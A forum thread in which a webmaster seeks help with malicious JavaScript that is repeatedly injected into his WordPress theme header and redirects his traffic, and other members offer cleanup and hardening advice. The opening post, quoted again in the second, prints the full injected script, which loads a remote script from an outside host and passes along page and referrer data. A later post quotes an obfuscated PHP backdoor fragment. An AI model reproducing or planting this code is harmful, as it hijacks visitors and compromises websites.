Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar Mark Forums Read
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 11-09-2016, 08:17 AM   #1
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Scripts inserted in my WP themes header

somehow some scripts are placed in my them header that contain malware and redirect traffic to other sites
I changed themes 3 times, got hosting scan the malaware, which they did and delet, but it happens every day. It points to different sites. some were adult dating sites. below a sample.
How can I get rid of these things? it has costed memoney to fix some stuff and also lost over half of my traffic

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"=" +b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.lengt h;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b ))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cf goid",1,1),1==getCookie("__cfgoid")&&(setCookie("_ _cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
ravenazrael is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 08:42 AM   #2
Brian mike
#Alberta51
 
Brian mike's Avatar
 
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
Quote:
Originally Posted by ravenazrael View Post
somehow some scripts are placed in my them header that contain malware and redirect traffic to other sites
I changed themes 3 times, got hosting scan the malaware, which they did and delet, but it happens every day. It points to different sites. some were adult dating sites. below a sample.
How can I get rid of these things? it has costed memoney to fix some stuff and also lost over half of my traffic

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"=" +b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.lengt h;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b ))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cf goid",1,1),1==getCookie("__cfgoid")&&(setCookie("_ _cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
Do you use ad network ? I mean are you a publisher ? This could be the way they get in your site.
Without accuse any company you should look into this too.
__________________
Tube - Cam - Escorts - Top List
Menu Tab - Banner - Header Link - Blog Post
DM me
Brian mike is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 09:14 AM   #3
Fetish Gimp
Confirmed User
 
Industry Role:
Join Date: Feb 2005
Posts: 1,699
I would suggest:
  • Make sure you're running updated Wordpress installations, and that all your plugins are updated.
  • If you're running any plugins that are not from the Wordpress repository, disable them. Enable them one at a time and check to see if the malicious code comes back.
  • Check that all Wordpress users with admin privileges are ones you know should exist, and change their passwords just in case.
  • Change your FTP user/passwords.

Check out these links on making Wordpress more secure:
https://codex.wordpress.org/Hardening_WordPress
Securing WordPress: Hardening Basics | The State of Security
https://www.wordfence.com/learn/how-...rdpress-sites/
__________________
Strapon Seduction - femdom blog | Twitter
Fetish Gimp is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 09:33 AM   #4
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Thanks. everything started when I used an ad networks script months ago, then stopped, then cleaned the whole site, but it has been returning many many times

All plugins are from WP repository. The problem is that the issue happens every day or every two days so running without a plug in per day test may end like next year and still it may harm the website.
the 3 admins are me and the developers I had to hire to fix the issue. no one else has logged in to the site as admin in the past weeks

is there a way to block scripts?
ravenazrael is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 09:40 AM   #5
Brian mike
#Alberta51
 
Brian mike's Avatar
 
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
Can you check on your Jetpact stats and tell me if you see outbound click going to url like this : 01.wp.com etc ... if anything look similar?
Many think those are legit outbound but THEY ARE NOT. i mean we have discover Hacked file with the above URL or similar.

Also check webmaster/ tools USER owner property. if anyone new have been added as owner. Been hacked this way before.
__________________
Tube - Cam - Escorts - Top List
Menu Tab - Banner - Header Link - Blog Post
DM me
Brian mike is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 11:32 AM   #6
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Quote:
Originally Posted by Brian mike View Post
Can you check on your Jetpact stats and tell me if you see outbound click going to url like this : 01.wp.com etc ... if anything look similar?
Many think those are legit outbound but THEY ARE NOT. i mean we have discover Hacked file with the above URL or similar.

Also check webmaster/ tools USER owner property. if anyone new have been added as owner. Been hacked this way before.
nope, none of them show anything
ravenazrael is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 11:35 AM   #7
Colmike9
(>^_^)b
 
Colmike9's Avatar
 
Industry Role:
Join Date: Dec 2011
Posts: 7,223
Find out what program and with what refID they're sending traffic to, then report them to that program so that they get canned and not paid..
__________________
Join the BEST cam affiliate program on the internet!
I've referred over $1.7mil in spending this past year, you should join in.
I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..
Colmike9 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 11:38 AM   #8
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Quote:
Originally Posted by Colmike7 View Post
Find out what program and with what refID they're sending traffic to, then report them to that program so that they get canned and not paid..
i will do that, but still that may not stop them to do it, as they might just go to other affiliates. is there a way to block a specific script? regardless of the url?
ravenazrael is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 11:44 AM   #9
Brian mike
#Alberta51
 
Brian mike's Avatar
 
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
Quote:
Originally Posted by ravenazrael View Post
i will do that, but still that may not stop them to do it, as they might just go to other affiliates. is there a way to block a specific script? regardless of the url?
Talk to Roby https://gfy.com/business-services/122...l#post21246502

At this point if your tech can't fix it try another one mate. Or worst case change Theme.

Good Luck and keep us posted
__________________
Tube - Cam - Escorts - Top List
Menu Tab - Banner - Header Link - Blog Post
DM me
Brian mike is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 11:54 AM   #10
Colmike9
(>^_^)b
 
Colmike9's Avatar
 
Industry Role:
Join Date: Dec 2011
Posts: 7,223
Quote:
Originally Posted by ravenazrael View Post
i will do that, but still that may not stop them to do it, as they might just go to other affiliates. is there a way to block a specific script? regardless of the url?
I have one way to block the script without removing it, but it's stupid so I won't post it..


Try removing the script, then change your cPanel and WP passwords, "harden" WP if you know how, remove plugins and themes that you don't use anymore, make sure file permissions are set right, see if there are any weird fake files added like jquery.min.php or .ftpquote, check uploads folder for things that don't belong, and sometimes people with this issue have resolved it with something called Sucuri.

Hope this helps.
__________________
Join the BEST cam affiliate program on the internet!
I've referred over $1.7mil in spending this past year, you should join in.
I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..
Colmike9 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 11:59 AM   #11
Brian mike
#Alberta51
 
Brian mike's Avatar
 
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
Colmike your link is VIrusssssssssssss

DONT CLICK THIS LINK see bellow why

__________________
Tube - Cam - Escorts - Top List
Menu Tab - Banner - Header Link - Blog Post
DM me
Brian mike is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 12:04 PM   #12
Colmike9
(>^_^)b
 
Colmike9's Avatar
 
Industry Role:
Join Date: Dec 2011
Posts: 7,223
Quote:
Originally Posted by Brian mike View Post
Colmike your link is VIrusssssssssssss

DONT CLICK THIS LINK see bellow why

I removed it, but that was just sucuri.net showing the malware in plain text.
__________________
Join the BEST cam affiliate program on the internet!
I've referred over $1.7mil in spending this past year, you should join in.
I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..
Colmike9 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 01:03 PM   #13
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
ok thanks.. will let you know if something of this works out
ravenazrael is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 01:13 PM   #14
Google Expert
Webmaster
 
Google Expert's Avatar
 
Industry Role:
Join Date: Jun 2004
Posts: 14,294
We used to have exactly same thing. Even managed to track down the fucking russian down to his home address.

We tried EVERYTHING to get rid of it. And the only thing that worked was a complete server wipe.

They inject their code through some shitty wp plugin, and then the virus spreads everywhere on your system. Even limiting server access by IP firewall didn't help. Had to wipe/format the server.
Google Expert is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 01:30 PM   #15
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Quote:
Originally Posted by Google Expert View Post
We used to have exactly same thing. Even managed to track down the fucking russian down to his home address.

We tried EVERYTHING to get rid of it. And the only thing that worked was a complete server wipe.

They inject their code through some shitty wp plugin, and then the virus spreads everywhere on your system. Even limiting server access by IP firewall didn't help. Had to wipe/format the server.
thanks. I'll need to get someone to do that.
ravenazrael is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 02:09 PM   #16
Bama
Confirmed User
 
Join Date: Nov 2001
Location: Redmond, WA
Posts: 2,727
If you have downloaded a theme and it has encrypted ANYTHING on it, that is probably the source of the problem.
Bama is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 02:13 PM   #17
Relic
So Fucking Banned
 
Join Date: Aug 2002
Posts: 10,300
That's what you get not keeping software up to date, op.
Relic is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 02:25 PM   #18
PornAffiliate
Affiliate
 
PornAffiliate's Avatar
 
Industry Role:
Join Date: Feb 2008
Posts: 241
You probably already have tried some malware plugins - but if you havent tried this one I would give it a go: https://wordpress.org/plugins/gotmls/
__________________
Porn Affiliate Programs - The Best Affiliate Programs & Some Webmaster Resources Like Free WP Themes.
PornAffiliate is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 08:45 PM   #19
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
thanks guys and tahnsk for the recommendations.
a i am not tech savy and the person helping me is MIA i tried to find the issue myself
what is the dirs.php file supposed to do?
i think that is one of the issues. it has crap like this one
${S8TWxbKKKF("8Cw8}y27>v#")} = ${VpyOMClU(";ZC0b:wf~")}(Array(S8TWxbKKKF("2?@=") => Array(RoPOn5JDKcTm("70@5=3") => XcNWgTqO("xx}!"), HQZTMCcx4OL("20-13A") => S8TWxbKKKF("k::A3=D\\FLD:bI-=>;943G=D8XDXEFG\\8BFBU@>93=3@688"), S8TWxbKKKF("-::A3=D") => $content)));
ravenazrael is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 09:34 PM   #20
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
what does it mean when wordfence tells you that somebody came to your site and tried to access non existent page. the non-existent pages are not real pages...
http://www.boobsrealm.com/wp-content.../wordfence.png
ravenazrael is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 09:58 PM   #21
Fetish Gimp
Confirmed User
 
Industry Role:
Join Date: Feb 2005
Posts: 1,699
Quote:
Originally Posted by ravenazrael View Post
what is the dirs.php file supposed to do?
i think that is one of the issues. it has crap like this one
${S8TWxbKKKF("8Cw8}y27>v#")} = ${VpyOMClU(";ZC0b:wf~")}(Array(S8TWxbKKKF("2?@=") => Array(RoPOn5JDKcTm("70@5=3") => XcNWgTqO("xx}!"), HQZTMCcx4OL("20-13A") => S8TWxbKKKF("k::A3=D\\FLD:bI-=>;943G=D8XDXEFG\\8BFBU@>93=3@688"), S8TWxbKKKF("-::A3=D") => $content)));
Wordpress itself does not have any such file.

If you found that file on the root directory of your Wordpress install, and you're sure that all your plugins are safe, then it is highly likely access to your server has been compromised.

I would suggest trying this, in this order:
  1. Change all your server-related user/passwords (ftp/cpanel, ssh)
  2. Change all your Wordpress passwords
  3. Delete the dirs.php file you found

If the script issue persists after all that, then your problem is as serious as Google Expert's because infected files are hidden somewhere else in your server.
__________________
Strapon Seduction - femdom blog | Twitter
Fetish Gimp is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 10:36 PM   #22
Colmike9
(>^_^)b
 
Colmike9's Avatar
 
Industry Role:
Join Date: Dec 2011
Posts: 7,223
Quote:
Originally Posted by ravenazrael View Post
what does it mean when wordfence tells you that somebody came to your site and tried to access non existent page. the non-existent pages are not real pages...
http://www.boobsrealm.com/wp-content.../wordfence.png
Probably a bot checking sites for backdoors and/or other vulnerabilities..

There are others, too, like if you see a bunch of random.com/something/feed showing up then that's a bot looking for content to scrape.
__________________
Join the BEST cam affiliate program on the internet!
I've referred over $1.7mil in spending this past year, you should join in.
I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..
Colmike9 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-09-2016, 11:48 PM   #23
lezinterracial
Confirmed User
 
Industry Role:
Join Date: Jul 2012
Posts: 3,064
Quote:
Originally Posted by ravenazrael View Post
what does it mean when wordfence tells you that somebody came to your site and tried to access non existent page. the non-existent pages are not real pages...
http://www.boobsrealm.com/wp-content.../wordfence.png
That doesn't look malicious to me. Looks like your css in your theme is looking for a font that is in your theme that it can't find.

I would search "fonts/fontawesome-webfont.woff2 found" or "themes/redwave-lite/fonts/fontawesome-webfont.woff?version=4.3.0"

If you want to fix this error. You may want to look for your hack though.



Are you on shared hosting? Can you find when your file is getting changed? Maybe check the site log for when the hacked file is getting updated.

Did you change your ftp password like Fetish Gimp mentioned? Did you change your wordpress password?

I like to rename wp-login.php to something else and change it back only when I need to make an update. I don't think this will help you, but may be worth a try.
__________________
Live Sex Shows
lezinterracial is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-10-2016, 01:56 AM   #24
jscott
So Fucking Banned
 
Industry Role:
Join Date: Feb 2001
Location: Taipei
Posts: 25,198
ravenazrael, you are in for a big surprise. This shit has been hitting my sites for months, it's no easy cleanup. Sometimes they can make your sites appear to be normal while stealing all your Google traffic too.

https://aw-snap.info/file-viewer/
I found this online website scanning tool very helpful

This is a terrible, terrible thing Good luck getting it fixed
jscott is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-10-2016, 02:07 AM   #25
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Thanks to everybody!
Yes it has been hitting me for months and it looked normal for a while. my traffic has gone to 1/3 now
ravenazrael is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-10-2016, 02:15 AM   #26
just a punk
So fuckin' bored
 
just a punk's Avatar
 
Industry Role:
Join Date: Jun 2003
Posts: 32,381
Quote:
Originally Posted by Bama View Post
If you have downloaded a theme and it has encrypted ANYTHING on it, that is probably the source of the problem.
According to the reports I read, over 90% of all "nulled" plugins and themes that float on the pirate sites and torrents have a backdoor.
__________________
Obey the Cowgod
just a punk is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-10-2016, 06:59 AM   #27
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Quote:
Originally Posted by CyberSEO View Post
According to the reports I read, over 90% of all "nulled" plugins and themes that float on the pirate sites and torrents have a backdoor.
all plugins were download from the WP repository... files were cleared... but script returned again =(
ravenazrael is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-10-2016, 07:20 AM   #28
Brian mike
#Alberta51
 
Brian mike's Avatar
 
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
Quote:
Originally Posted by ravenazrael View Post
all plugins were download from the WP repository... files were cleared... but script returned again =(
Blame Donald Trump ( Joke aside trying to make you smile for 5 sec. ) I feel you mate, do you think its time to wipe out ?

I have my part of problem also, moving server is a Bitch.... Hitting my head on my desk for the last 72 hours grrrrr.

At least you know where the problem come from, i suggest you to TAKE Big action to wipe it out.
__________________
Tube - Cam - Escorts - Top List
Menu Tab - Banner - Header Link - Blog Post
DM me
Brian mike is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-10-2016, 09:14 AM   #29
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Quote:
Originally Posted by Brian mike View Post
Blame Donald Trump ( Joke aside trying to make you smile for 5 sec. ) I feel you mate, do you think its time to wipe out ?

I have my part of problem also, moving server is a Bitch.... Hitting my head on my desk for the last 72 hours grrrrr.

At least you know where the problem come from, i suggest you to TAKE Big action to wipe it out.
by wipe out you mean the whole site and content?? =(
ravenazrael is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-10-2016, 10:16 AM   #30
Fetish Gimp
Confirmed User
 
Industry Role:
Join Date: Feb 2005
Posts: 1,699
Quote:
Originally Posted by ravenazrael View Post
by wipe out you mean the whole site and content?? =(
I believe what he means is that you back-up your database and image/video files, and wipe the server clean. Change all passwords, and reinstall your backed up files.

One thing you might wanna do is to search your Wordpress database(s)for any scripts that might have been injected into it. Search for any <script> tags and strings from the script that keeps getting injected just in case they've been saved into the database so that whenever Wordpress runs, they get put back in.
__________________
Strapon Seduction - femdom blog | Twitter
Fetish Gimp is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-10-2016, 10:28 AM   #31
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Quote:
Originally Posted by Fetish Gimp View Post
I believe what he means is that you back-up your database and image/video files, and wipe the server clean. Change all passwords, and reinstall your backed up files.

One thing you might wanna do is to search your Wordpress database(s)for any scripts that might have been injected into it. Search for any <script> tags and strings from the script that keeps getting injected just in case they've been saved into the database so that whenever Wordpress runs, they get put back in.
thanks. well that was done before... two months ago.. and the problem persisted
ravenazrael is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-13-2016, 05:47 PM   #32
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
seems it is finally solved. thanks to you all!
ravenazrael is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-14-2016, 12:06 AM   #33
jscott
So Fucking Banned
 
Industry Role:
Join Date: Feb 2001
Location: Taipei
Posts: 25,198
oh it's never solved
jscott is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-14-2016, 02:17 AM   #34
klinton
So Fucking Banned
 
Industry Role:
Join Date: Apr 2003
Location: online
Posts: 8,766
so how did you fix it ?
Quote:
Originally Posted by ravenazrael View Post
seems it is finally solved. thanks to you all!
klinton is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-14-2016, 02:22 AM   #35
PornDiscounts-V
Confirmed User
 
PornDiscounts-V's Avatar
 
Industry Role:
Join Date: Oct 2003
Location: L.A.
Posts: 5,744
They may likely made many backdoor shells. Beat bet is to format, then import only posts from old database on fresh install.
__________________
Blog Posts - Contextual Links - Hardlinks on 600+ Blog Network
* Handwritten * 180 C Class IPs * Permanent! * Many Niches! * Bulk Discounts! GFYPosts /at/ J2Media.net
PornDiscounts-V is online now   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-14-2016, 09:33 PM   #36
MichaelA2014
Registered User
 
Industry Role:
Join Date: Oct 2014
Posts: 9
Back up only post content and images. nothing else. Then do a clean install. Most likely you got that code when you 'tried' one of those nulled plugins from blackhat forums or let one of those bargain freelancers work on your site.
MichaelA2014 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-15-2016, 04:43 AM   #37
j3rkules
VIP
 
j3rkules's Avatar
 
Industry Role:
Join Date: Jul 2013
Posts: 22,111
Quote:
Originally Posted by klinton View Post
so how did you fix it ?
I am also curious after reading all of this.
j3rkules is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-15-2016, 05:37 AM   #38
Google Expert
Webmaster
 
Google Expert's Avatar
 
Industry Role:
Join Date: Jun 2004
Posts: 14,294
Quote:
Originally Posted by ravenazrael View Post
all plugins were download from the WP repository... files were cleared... but script returned again =(
I already told you. The script infected all your server.

You need format HDD and do a clean OS install.

Other than this, nothing will help.
Google Expert is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-15-2016, 07:11 AM   #39
Paz
Confirmed User
 
Paz's Avatar
 
Industry Role:
Join Date: Jun 2012
Posts: 457
Quote:
Originally Posted by Google Expert View Post
I already told you. The script infected all your server.

You need format HDD and do a clean OS install.

Other than this, nothing will help.
This isn't true. You can update plugins themes, run malware scanners and update all your passwords then install a Better Security plugin. It's a pain but much quicker than a format and clean install.
Paz is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-15-2016, 07:53 AM   #40
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Quote:
Originally Posted by Paz View Post
This isn't true. You can update plugins themes, run malware scanners and update all your passwords then install a Better Security plugin. It's a pain but much quicker than a format and clean install.
yep.. that is what worked.. so far
I actually never downloaded any plugin or script from BHW. i remember it all started when I inserted a script from a well-known ad network. Not sure if it triggered it or was coincidence
ravenazrael is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-15-2016, 04:24 PM   #41
ErectMedia
Confirmed Chicago Pimp
 
ErectMedia's Avatar
 
Industry Role:
Join Date: Aug 2004
Location: Chicago
Posts: 7,100
Basics....

https://ithemes.com/2016/10/13/how-t...ly-and-easily/

Good plugin...

https://wordpress.org/plugins/all-in...-and-firewall/

If that doesn't do it could route DNS through Incapsula to kill off some bad shit before it even gets to your server. CloudFlare more popular and a good CDN but in terms of security Incapsula's free plan blocks more bad shit out than CloudFlare's paid plan.
ErectMedia is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-15-2016, 04:56 PM   #42
Shoplifter
Richest man in Babylon
 
Shoplifter's Avatar
 
Industry Role:
Join Date: Jan 2002
Location: Posts: 10,002
Posts: 5,687
It is possible to clean out a hacked Wordpress setup and indeed I have done it.

One thing that may help you is this: find /pathtoyourfiles/yourblog.com -mtime -2 -ls

It will list all of the files that have been modified in the past two days, which is very helpful in catching backdoor shell scripts and files being placed on your server.

If the attacker is using your site to send spam emails it's easy to find the originating script from the email header. Then you can delete it and also search in your logs for other scripts being used to send email. Usually the attacker will have three systems going, one is the actual backdoor that allows him to place files on your server, the other are the scripts that they use to send spam emails, and the other is a page on your website that acts as an endpoint for the URLs in his spam emails. This is the classic attack these days and once you can wrap your head around what they are trying to so it's a lot easier to prevent it.

It can also help if you use something like wordfence which will catch some but not all of the problems. Also keep your plugins up to date and delete any old plugins and themes.
Shoplifter is online now   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-15-2016, 07:44 PM   #43
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
thank you! I hope all this also helps somebody else who may have similar issues in the future
ravenazrael is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 11-15-2016, 09:23 PM   #44
Google Expert
Webmaster
 
Google Expert's Avatar
 
Industry Role:
Join Date: Jun 2004
Posts: 14,294
Quote:
Originally Posted by Paz View Post
This isn't true. You can update plugins themes, run malware scanners and update all your passwords then install a Better Security plugin. It's a pain but much quicker than a format and clean install.
Do you understand that he injected the code everywhere outside the WordPress?

We had spend 6 months trying to clean it out from our server. It would always come back. In the end we had to format HD and reinstall OS.

P.S.
they also try to hide their presence by redirecting certain countries only. So you may be viewing the site and thinking that all is good, while people from other countries are being redirected to his doorway pages.
Google Expert is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks

Tags
sites, scripts, themes, header, traffic, rid, costed, memoney, dating, sample, d=new, efunction, getcookieaforvar, setcookiea, b, cvar, a=;settimeout1;function, adult, stuff, lost, var, half, fix, day, redirect, malware, inserted
Thread Tools



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.